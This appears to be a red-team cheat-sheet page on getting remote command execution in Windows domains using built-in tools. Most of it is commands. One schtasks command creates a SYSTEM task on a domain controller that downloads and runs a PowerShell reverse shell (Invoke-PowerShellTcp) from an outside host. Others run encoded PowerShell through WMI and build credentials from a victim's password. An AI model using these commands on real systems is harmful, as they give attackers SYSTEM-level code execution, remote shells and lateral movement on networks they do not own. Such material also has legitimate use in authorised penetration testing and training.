🟢Remote Command Execution

Living of the land and getting RCEs

Tool

winrs

Invoke-Command

Remote Command execution with scheduled tasks

schtasks /create /tn "shell" /ru "NT Authority\SYSTEM" /s dc.targetdomain.com /sc weekly /tr "Powershell.exe -c 'IEX (New-Object Net.WebClient).DownloadString(''http://172.16.10.5/Invoke-PowerShellTcpRun.ps1''')'"
schtasks /RUN /TN "shell" /s dc.targetdomain.com

WMI - Remote Command execution

Invoke-WmiMethod win32_process -ComputerName dc.targetdomain.com -name create -argumentlist "powershell.exe -e $encodedCommand"

PowerShell - Remote Command execution

$SecPassword = ConvertTo-SecureString 'VictimUserPassword' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\targetuser', $SecPassword)

Last updated